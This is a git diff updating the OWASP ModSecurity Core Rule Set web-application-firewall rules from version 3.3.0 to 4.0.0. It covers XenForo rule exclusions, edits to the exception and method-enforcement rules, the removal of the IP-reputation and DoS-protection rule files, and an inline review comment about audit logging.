- -SecAction \ - "id:9006800,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetById=931120;ARGS:_xfRedirect,\ - ctl:ruleRemoveTargetById=941150;ARGS:_xfRedirect,\ - ctl:ruleRemoveTargetById=942230;ARGS:_xfRedirect,\ - ctl:ruleRemoveTargetById=942260;ARGS:_xfRedirect,\ - ctl:ruleRemoveTargetById=931120;ARGS:_xfRequestUri,\ - ctl:ruleRemoveTargetById=941150;ARGS:_xfRequestUri,\ - ctl:ruleRemoveTargetById=942130;ARGS:_xfRequestUri,\ - ctl:ruleRemoveTargetById=942230;ARGS:_xfRequestUri,\ - ctl:ruleRemoveTargetById=942260;ARGS:_xfRequestUri,\ - ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:xf_csrf,\ - ctl:ruleRemoveTargetById=942210;REQUEST_COOKIES:xf_csrf,\ - ctl:ruleRemoveTargetById=942440;REQUEST_COOKIES:xf_csrf,\ - ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:xf_emoji_usage,\ - ctl:ruleRemoveTargetById=942150;REQUEST_COOKIES:xf_emoji_usage,\ - ctl:ruleRemoveTargetById=942410;REQUEST_COOKIES:xf_emoji_usage,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;REQUEST_COOKIES:xf_ls,\ - ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:xf_session,\ - ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:xf_user,\ - ver:'OWASP_CRS/3.3.0'" - -# -# -=[ XenForo Administration Back-End ]=- -# - -# Skip this section for performance unless requested file is admin.php - -SecRule REQUEST_FILENAME "!@endsWith /admin.php" \ - "id:9006900,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-XENFORO-ADMIN" - -SecRule REQUEST_FILENAME "!@endsWith /admin.php" \ - "id:9006901,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-XENFORO-ADMIN" - -# Admin edit user -# POST /xf/admin.php?users/the-user-name.12345/edit -SecRule REQUEST_URI "@rx /admin\.php\?users/.*\.\d+/edit$" \ - "id:9006910,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:profile[about],\ - ctl:ruleRemoveTargetById=931130;ARGS:profile[website],\ - ver:'OWASP_CRS/3.3.0'" - -# Admin save user -# POST 
/xf/admin.php?users/the-user-name.12345/save -# Runs in phase 1 to be able to remove rule 200003. -SecRule REQUEST_URI "@rx /admin\.php\?users/.*\.\d+/save$" \ - "id:9006920,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveById=200003,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:custom_fields[occupation],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:custom_fields[personal_quote],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:profile[about],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:profile[signature],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:custom_fields[sexuality],\ - ctl:ruleRemoveTargetById=931130;ARGS:custom_fields[picture],\ - ctl:ruleRemoveTargetById=931130;ARGS:profile[website],\ - ver:'OWASP_CRS/3.3.0'" - - -# Admin edit forum notice -# POST /xf/admin.php?notices/0/save -# POST /xf/admin.php?notices/forum-name.12345/save -SecRule REQUEST_URI "@rx /admin\.php\?notices/(?:.*\.)?\d+/save$" \ - "id:9006930,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:title,\ - ver:'OWASP_CRS/3.3.0'" - -# Admin batch thread update -# POST /xf/admin.php?threads/batch-update/action -SecRule REQUEST_URI "@rx /admin\.php\?(?:threads|users)/batch-update/action$" \ - "id:9006940,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetById=942200;ARGS:criteria,\ - ctl:ruleRemoveTargetById=942260;ARGS:criteria,\ - ctl:ruleRemoveTargetById=942330;ARGS:criteria,\ - ctl:ruleRemoveTargetById=942340;ARGS:criteria,\ - ctl:ruleRemoveTargetById=942370;ARGS:criteria,\ - ver:'OWASP_CRS/3.3.0'" - -# Edit forum theme -# POST /xf/admin.php?styles/title.1234/style-properties/group&group=basic -SecRule REQUEST_URI "@rx /admin\.php\?styles/" \ - "id:9006950,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetById=942200;ARGS:json,\ - ctl:ruleRemoveTargetById=942260;ARGS:json,\ - ctl:ruleRemoveTargetById=942300;ARGS:json,\ - ctl:ruleRemoveTargetById=942330;ARGS:json,\ - 
ctl:ruleRemoveTargetById=942340;ARGS:json,\ - ctl:ruleRemoveTargetById=942370;ARGS:json,\ - ctl:ruleRemoveTargetById=942440;ARGS:json,\ - ver:'OWASP_CRS/3.3.0'" - -# Set forum options -# POST /xf/admin.php?options/update -SecRule REQUEST_URI "@rx /admin\.php\?options/update" \ - "id:9006960,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:options[boardInactiveMessage],\ - ver:'OWASP_CRS/3.3.0'" - -# Edit pages/templates -# POST /xf/admin.php?pages/0/save -# POST /xf/admin.php?pages/foo.12345/save -# POST /xf/admin.php?templates/foo.1234/save -SecRule REQUEST_URI "@rx /admin\.php\?(?:pages|templates)/.*/save" \ - "id:9006970,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:template,\ - ver:'OWASP_CRS/3.3.0'" - -SecMarker "END-XENFORO-ADMIN" - -SecMarker "END-XENFORO" diff --git a/rules/REQUEST-905-COMMON-EXCEPTIONS.conf b/rules/REQUEST-905-COMMON-EXCEPTIONS.conf index 75191b10c6..67fde5b48a 100644 --- a/rules/REQUEST-905-COMMON-EXCEPTIONS.conf +++ b/rules/REQUEST-905-COMMON-EXCEPTIONS.conf @@ -1,8 +1,9 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. # -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ @@ -23,11 +24,11 @@ SecRule REQUEST_LINE "@streq GET /" \ tag:'language-multi',\ tag:'platform-apache',\ tag:'attack-generic',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ chain" SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \ "t:none,\ - ctl:ruleEngine=Off,\ + ctl:ruleRemoveByTag=OWASP_CRS,\ ctl:auditEngine=Off" # 
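Review bot: With `ctl:ruleEngine=Off` replaced by `ctl:ruleRemoveByTag=OWASP_CRS` in the `@@ -23,11 +24,11 @@` hunk, rules that do not carry the OWASP_CRS tag (site-local or third-party rules) now run for these localhost requests, yet the unchanged `ctl:auditEngine=Off` on the following line still suppresses the audit log for them, so a match from such a rule is never recorded. Either drop `ctl:auditEngine=Off` so that non-CRS matches stay visible, or document the trade-off above the rule, e.g. `# Only OWASP_CRS-tagged rules are removed here; other rules still run but are not audit logged`. The same pair occurs in the next hunk (`@@ -43,12 +44,12 @@`, the chain ending on `REQUEST_HEADERS:User-Agent "@endsWith (internal dummy connection)"`). Both rules start above their hunks, so their phase and the comment block preceding them are not visible here and presumably still describe the old behaviour.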
@@ -43,12 +44,12 @@ SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \ tag:'language-multi',\ tag:'platform-apache',\ tag:'attack-generic',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ chain" SecRule REQUEST_HEADERS:User-Agent "@endsWith (internal dummy connection)" \ "t:none,\ chain" SecRule REQUEST_LINE "@rx ^(?:GET /|OPTIONS \*) HTTP/[12]\.[01]$" \ "t:none,\ - ctl:ruleEngine=Off,\ + ctl:ruleRemoveByTag=OWASP_CRS,\ ctl:auditEngine=Off" diff --git a/rules/REQUEST-910-IP-REPUTATION.conf b/rules/REQUEST-910-IP-REPUTATION.conf deleted file mode 100644 index 904654af82..0000000000 --- a/rules/REQUEST-910-IP-REPUTATION.conf +++ /dev/null 
@@ -1,326 +0,0 @@ -# ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 -# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. -# -# The OWASP ModSecurity Core Rule Set is distributed under -# Apache Software License (ASL) version 2 -# Please see the enclosed LICENSE file for full details. -# ------------------------------------------------------------------------ - -# -# -= Paranoia Level 0 (empty) =- (apply unconditionally) -# - - -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:910011,phase:1,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:910012,phase:2,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" -# -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) -# - -# -# -=[ IP Reputation Block Flag Check ]=- -# -# The first check we do is to see if the client IP address has already -# been blacklisted by rules from previous requests. -# -# If the rule matches, it will do a skipAfter and pick up processing -# at the end of the request phase for actual blocking. -# -SecRule TX:DO_REPUT_BLOCK "@eq 1" \ - "id:910000,\ - phase:2,\ - block,\ - t:none,\ - msg:'Request from Known Malicious Client (Based on previous traffic violations)',\ - logdata:'Previous Block Reason: %{ip.reput_block_reason}',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-reputation-ip',\ - tag:'paranoia-level/1',\ - tag:'OWASP_CRS',\ - ver:'OWASP_CRS/3.3.0',\ - severity:'CRITICAL',\ - chain,\ - skipAfter:BEGIN-REQUEST-BLOCKING-EVAL" - SecRule IP:REPUT_BLOCK_FLAG "@eq 1" \ - "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - - -# -# -=[ GeoIP Checks ]=- -# -# This rule requires activating the SecGeoLookupDB directive -# in the crs-setup.conf file and specifying -# the list of blocked countries (tx.high_risk_country_codes). 
-# -# This rule does a GeoIP resolution on the client IP address. -# -SecRule TX:HIGH_RISK_COUNTRY_CODES "!@rx ^$" \ - "id:910100,\ - phase:2,\ - block,\ - t:none,\ - msg:'Client IP is from a HIGH Risk Country Location',\ - logdata:'%{MATCHED_VAR}',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-reputation-ip',\ - tag:'paranoia-level/1',\ - tag:'OWASP_CRS',\ - ver:'OWASP_CRS/3.3.0',\ - severity:'CRITICAL',\ - chain" - SecRule TX:REAL_IP "@geoLookup" \ - "chain" - SecRule GEO:COUNTRY_CODE "@within %{tx.high_risk_country_codes}" \ - "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'ip.reput_block_flag=1',\ - setvar:'ip.reput_block_reason=%{rule.msg}',\ - expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" - - -# -# -=[ IP Reputation Checks ]=- -# -# ModSecurity Rules from Trustwave SpiderLabs: IP Blacklist Alert -# Ref: http://www.modsecurity.org/projects/commercial/rules/ -# -# This rule checks the client IP address against a list of recent IPs captured -# from the SpiderLabs web honeypot systems (last 48 hours). -# -#SecRule TX:REAL_IP "@ipMatchFromFile ip_blacklist.data" \ -# "id:910110,\ -# phase:2,\ -# block,\ -# t:none,\ -# msg:'Client IP in Trustwave SpiderLabs IP Reputation Blacklist',\ -# tag:'application-multi',\ -# tag:'language-multi',\ -# tag:'platform-multi',\ -# tag:'attack-reputation-ip',\ -# tag:'paranoia-level/1',\ -# severity:'CRITICAL',\ -# setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ -# setvar:'ip.reput_block_flag=1',\ -# setvar:'ip.reput_block_reason=%{rule.msg}',\ -# expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" - - -# -# First check if we have already run an @rbl check for this IP by checking in IP collection. -# If we have, then skip doing another check. 
-# -SecRule IP:PREVIOUS_RBL_CHECK "@eq 1" \ - "id:910120,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-reputation-ip',\ - tag:'paranoia-level/1',\ - tag:'OWASP_CRS',\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-RBL-LOOKUP" - -# -# Check Client IP against ProjectHoneypot's HTTP Blacklist -# Ref: http://www.projecthoneypot.org/httpbl_api.php -# -# To use the blacklist, you must register for an HttpBL API Key -# and choose the traffic types to block. See section -# "Project Honey Pot HTTP Blacklist" in crs-setup.conf. -# -# Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecHttpBlKey -# - -# Skip HttpBL checks if user has not defined one of the TX:block_* variables. -# This prevents error "Operator error: RBL httpBl called but no key defined: set SecHttpBlKey" -SecRule &TX:block_suspicious_ip "@eq 0" \ - "id:910130,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - tag:'paranoia-level/1',\ - tag:'OWASP_CRS',\ - ver:'OWASP_CRS/3.3.0',\ - chain,\ - skipAfter:END-RBL-CHECK" - SecRule &TX:block_harvester_ip "@eq 0" \ - "chain" - SecRule &TX:block_spammer_ip "@eq 0" \ - "chain" - SecRule &TX:block_search_ip "@eq 0" - -SecRule TX:REAL_IP "@rbl dnsbl.httpbl.org" \ - "id:910140,\ - phase:2,\ - pass,\ - capture,\ - t:none,\ - nolog,\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-reputation-ip',\ - tag:'paranoia-level/1',\ - tag:'OWASP_CRS',\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.httpbl_msg=%{tx.0}',\ - chain" - SecRule TX:httpbl_msg "@rx RBL lookup of .*?.dnsbl.httpbl.org succeeded at TX:checkip. 
(.*?): .*" \ - "capture,\ - t:none,\ - setvar:'tx.httpbl_msg=%{tx.1}'" - -# The following regexs are generated based off re_operators.c -SecRule TX:block_search_ip "@eq 1" \ - "id:910150,\ - phase:2,\ - block,\ - t:none,\ - msg:'HTTP Blacklist match for search engine IP',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-reputation-ip',\ - tag:'paranoia-level/1',\ - tag:'OWASP_CRS',\ - ver:'OWASP_CRS/3.3.0',\ - severity:'CRITICAL',\ - chain,\ - skipAfter:END-RBL-CHECK" - SecRule TX:httpbl_msg "@rx Search Engine" \ - "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'ip.reput_block_flag=1',\ - setvar:'ip.reput_block_reason=%{rule.msg}',\ - setvar:'ip.previous_rbl_check=1',\ - expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}',\ - expirevar:'ip.previous_rbl_check=86400'" - -SecRule TX:block_spammer_ip "@eq 1" \ - "id:910160,\ - phase:2,\ - block,\ - t:none,\ - msg:'HTTP Blacklist match for spammer IP',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-reputation-ip',\ - tag:'paranoia-level/1',\ - tag:'OWASP_CRS',\ - ver:'OWASP_CRS/3.3.0',\ - severity:'CRITICAL',\ - chain,\ - skipAfter:END-RBL-CHECK" - SecRule TX:httpbl_msg "@rx (?i)^.*? spammer .*?$" \ - "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'ip.reput_block_flag=1',\ - setvar:'ip.reput_block_reason=%{rule.msg}',\ - setvar:'ip.previous_rbl_check=1',\ - expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}',\ - expirevar:'ip.previous_rbl_check=86400'" - -SecRule TX:block_suspicious_ip "@eq 1" \ - "id:910170,\ - phase:2,\ - block,\ - t:none,\ - msg:'HTTP Blacklist match for suspicious IP',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-reputation-ip',\ - tag:'paranoia-level/1',\ - tag:'OWASP_CRS',\ - ver:'OWASP_CRS/3.3.0',\ - severity:'CRITICAL',\ - chain,\ - skipAfter:END-RBL-CHECK" - SecRule TX:httpbl_msg "@rx (?i)^.*? 
suspicious .*?$" \ - "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'ip.reput_block_flag=1',\ - setvar:'ip.reput_block_reason=%{rule.msg}',\ - setvar:'ip.previous_rbl_check=1',\ - expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}',\ - expirevar:'ip.previous_rbl_check=86400'" - -SecRule TX:block_harvester_ip "@eq 1" \ - "id:910180,\ - phase:2,\ - block,\ - t:none,\ - msg:'HTTP Blacklist match for harvester IP',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-reputation-ip',\ - tag:'paranoia-level/1',\ - tag:'OWASP_CRS',\ - ver:'OWASP_CRS/3.3.0',\ - severity:'CRITICAL',\ - chain,\ - skipAfter:END-RBL-CHECK" - SecRule TX:httpbl_msg "@rx (?i)^.*? harvester .*?$" \ - "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'ip.reput_block_flag=1',\ - setvar:'ip.reput_block_reason=%{rule.msg}',\ - setvar:'ip.previous_rbl_check=1',\ - expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}',\ - expirevar:'ip.previous_rbl_check=86400'" - -SecAction \ - "id:910190,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-reputation-ip',\ - tag:'paranoia-level/1',\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'ip.previous_rbl_check=1',\ - expirevar:'ip.previous_rbl_check=86400'" - -SecMarker "END-RBL-LOOKUP" - -SecMarker "END-RBL-CHECK" - - -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:910013,phase:1,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:910014,phase:2,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" -# -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) -# - - - -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:910015,phase:1,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:910016,phase:2,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" -# 
-# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) -# - - - -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:910017,phase:1,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:910018,phase:2,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" -# -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) -# - - - -# -# -= Paranoia Levels Finished =- -# -SecMarker "END-REQUEST-910-IP-REPUTATION" diff --git a/rules/REQUEST-911-METHOD-ENFORCEMENT.conf b/rules/REQUEST-911-METHOD-ENFORCEMENT.conf index d37729783c..e5171c4141 100644 --- a/rules/REQUEST-911-METHOD-ENFORCEMENT.conf +++ b/rules/REQUEST-911-METHOD-ENFORCEMENT.conf @@ -1,8 +1,9 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. # -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ 
@@ -13,10 +14,10 @@ -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:911011,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:911012,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:911011,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:911012,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" # -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # # @@ -26,7 +27,7 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:911012,phase:2,pass,nolog,skipAf # SecRule REQUEST_METHOD "!@within %{tx.allowed_methods}" \ "id:911100,\ - phase:2,\ + phase:1,\ block,\ msg:'Method is not allowed by policy',\ logdata:'%{MATCHED_VAR}',\ 
@@ -38,33 +39,33 @@ SecRule REQUEST_METHOD "!@within %{tx.allowed_methods}" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/274',\ tag:'PCI/12.1',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:911013,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:911014,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:911013,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:911014,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" # -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:911015,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:911016,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:911015,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:911016,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" # -# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:911017,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:911018,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" 
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:911017,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:911018,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" # -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/REQUEST-912-DOS-PROTECTION.conf b/rules/REQUEST-912-DOS-PROTECTION.conf deleted file mode 100644 index 4bad25893d..0000000000 --- a/rules/REQUEST-912-DOS-PROTECTION.conf +++ /dev/null 
@@ -1,328 +0,0 @@ -# ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 -# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. -# -# The OWASP ModSecurity Core Rule Set is distributed under -# Apache Software License (ASL) version 2 -# Please see the enclosed LICENSE file for full details. -# ------------------------------------------------------------------------ - -# -# Anti-Automation rules to detect Denial of Service attacks. -# -# Description of mechanics: -# When a request hits a non-static resource (TX:STATIC_EXTENSIONS), then a counter for the IP -# address is being raised (IP:DOS_COUNTER). If the counter (IP:DOS_COUNTER) hits a limit -# (TX:DOS_COUNTER_THRESHOLD), then a burst is identified (IP:DOS_BURST_COUNTER) and the -# counter (IP:DOS_COUNTER) is reset. The burst counter expires within a timeout period -# (TX:DOS_BURST_TIME_SLICE). -# If the burst counter (IP:DOS_BURST_COUNTER) is greater equal 2, then the blocking flag -# is being set (IP:DOS_BLOCK). The blocking flag (IP:DOS_BLOCK) expires within a timeout -# period (TX:DOS_BLOCK_TIMEOUT). All this counting happens in phase 5. -# There is a stricter sibling to this rule (912170) in paranoia level 2, where the -# burst counter check (IP:DOS_BURST_COUNTER) hits at greater equal 1. -# -# The blocking is done in phase 1: When the blocking flag is encountered (IP:DOS_BLOCK), -# then the request is dropped without sending a response. If this happens, then a -# counter is # raised (IP:DOS_BLOCK_COUNTER). -# When an IP address is blocked for the first time, then the blocking is reported in a -# message and a flag (IP:DOS_BLOCK_FLAG) is set. This flag expires in 60 seconds. -# When an IP address is blocked and the flag (IP:DOS_BLOCK_FLAG) is set, then the -# blocking is not being reported (to prevent a flood of alerts). 
When the flag -# (IP:DOS_BLOCK_FLAG) has expired and a new request is being blocked, then the -# counter (IP:DOS_BLOCK_COUNTER) is being reset to 0 and the block is being treated -# as the first block (-> alert). -# In order to be able to display the counter (IP:DOS_BLOCK_COUNTER) and resetting -# it at the same time, we copy the counter (IP:DOS_BLOCK_COUNTER) into a different -# variable (TX:DOS_BLOCK_COUNTER), which is then displayed in turn. -# -# Variables: -# IP:DOS_BLOCK Flag if an IP address should be blocked -# IP:DOS_BLOCK_COUNTER Counter of blocked requests -# IP:DOS_BLOCK_FLAG Flag keeping track of alert. Flag expires after 60 seconds. -# IP:DOS_BURST_COUNTER Burst counter -# IP:DOS_COUNTER Request counter (static resources are ignored) -# TX:DOS_BLOCK_COUNTER Copy of IP:DOS_BLOCK_COUNTER (needed for display reasons) -# TX:DOS_BLOCK_TIMEOUT Period in seconds a blocked IP will be blocked -# TX:DOS_COUNTER_THRESHOLD Limit of requests, where a burst is identified -# TX:DOS_BURST_TIME_SLICE Period in seconds when we will forget a burst -# TX:STATIC_EXTENSIONS Paths which can be ignored with regards to DoS -# -# As a precondition for these rules, please set the following three variables: -# - TX:DOS_BLOCK_TIMEOUT -# - TX:DOS_COUNTER_THRESHOLD -# - TX:DOS_BURST_TIME_SLICE -# -# And make sure that TX:STATIC_EXTENSIONS is also set. 
-# - -# -# -= Paranoia Level 0 (empty) =- (apply unconditionally) -# - -# -# Skip if variables defining DoS protection are not set -# -SecRule &TX:dos_burst_time_slice "@eq 0" \ - "id:912100,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain,\ - skipAfter:END-DOS-PROTECTION-CHECKS" - SecRule &TX:dos_counter_threshold "@eq 0" \ - "chain" - SecRule &TX:dos_block_timeout "@eq 0" - -SecRule &TX:dos_burst_time_slice "@eq 0" \ - "id:912110,\ - phase:5,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain,\ - skipAfter:END-DOS-PROTECTION-CHECKS" - SecRule &TX:dos_counter_threshold "@eq 0" \ - "chain" - SecRule &TX:dos_block_timeout "@eq 0" - - -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:912011,phase:1,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:912012,phase:2,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" -# -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) -# - -# -# -=[ Anti-Automation / DoS Protection : Block ]=- -# - -# -# Block and track # of requests and log -# -SecRule IP:DOS_BLOCK "@eq 1" \ - "id:912120,\ - phase:1,\ - drop,\ - msg:'Denial of Service (DoS) attack identified from %{tx.real_ip} (%{tx.dos_block_counter} hits since last alert)',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'paranoia-level/1',\ - tag:'attack-dos',\ - tag:'OWASP_CRS',\ - tag:'capec/1000/210/227/469',\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule &IP:DOS_BLOCK_FLAG 